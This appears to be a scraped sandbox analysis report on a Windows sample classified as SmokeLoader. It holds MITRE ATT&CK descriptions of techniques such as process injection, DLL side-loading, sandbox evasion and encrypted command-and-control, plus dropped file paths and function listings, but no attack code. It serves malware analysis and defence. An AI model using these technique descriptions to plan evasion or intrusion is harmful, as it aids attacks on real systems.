Instruction Fuzzy Hash: A7F0B4B35082416EE7355F20B904B6277A4E7C0329F65016FD6D0221D2DBBE2847961C

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3WaqgS34S7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7E95.exe

C:\Users\user\AppData\Local\Temp\F8FA.exe

C:\Users\user\AppData\Roaming\vdhivcv

C:\Users\user\AppData\Roaming\vdhivcv:Zone.Identifier

C:\Users\user\AppData\Roaming\wrhivcv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
3WaqgS34S7.exe

Function 00401546 Relevance: 10.8, APIs: 7, Instructions: 295
COMMON

Function 00401652 Relevance: 10.7, APIs: 7, Instructions: 181
nativeCOMMON

Function 0040165E Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 0040166A Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 00401691 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Function 00403135 Relevance: 3.2, APIs: 2, Instructions: 167
nativethreadCOMMON

Function 0040327E Relevance: 3.1, APIs: 2, Instructions: 114
COMMON

Function 009F0939 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 009A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 0041BD30 Relevance: 4.6, APIs: 3, Instructions: 60
librarymemoryloaderCOMMON

Function 009A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 0041BE70 Relevance: 1.5, APIs: 1, Instructions: 27
libraryCOMMON

Function 00401A23 Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Function 00401A2F Relevance: 1.3, APIs: 1, Instructions: 53
sleepCOMMON